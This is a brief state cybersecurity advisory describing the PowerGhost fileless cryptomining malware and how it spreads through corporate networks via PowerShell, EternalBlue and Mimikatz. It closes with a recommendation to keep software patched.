Fileless Malware Targeting Corporate Systems

Threat actors are deploying a new fileless malware to target corporate networks across the world. Dubbed PowerGhost, the fileless malware is distributed by infecting a single system in a business network and then propagates to other computers and servers on the network via PowerShell, EternalBlue, and Mimikatz. Once infected, devices are used to mine cryptocurrency, allowing threat actors to make a quick profit as the number of infected devices increases. The infection process begins with the attacker deploying exploits or remote administration tools such as Windows Management Instrumentation. During the infection process, a one-line PowerShell script runs and downloads a cryptocurrency miner, Mimikatz, EternalBlue exploit shellcode, and a reflective PE injection module. Once one machine is infected, Mimikatz is used to collect account credentials from the current machine and works together with the EternalBlue exploit to propagate through the network and infect additional devices. The NJCCIC recommends users and administrators review SecureList’s blog post for more information and keep all software patched and up-to-date to prevent the exploitation of known vulnerabilities.

Reference in this site to any specific commercial product, process, or service, or the use of any trade, firm or corporation name is for the information and convenience of the public, and does not constitute endorsement, recommendation, or favoring by the NJCCIC and the State of New Jersey.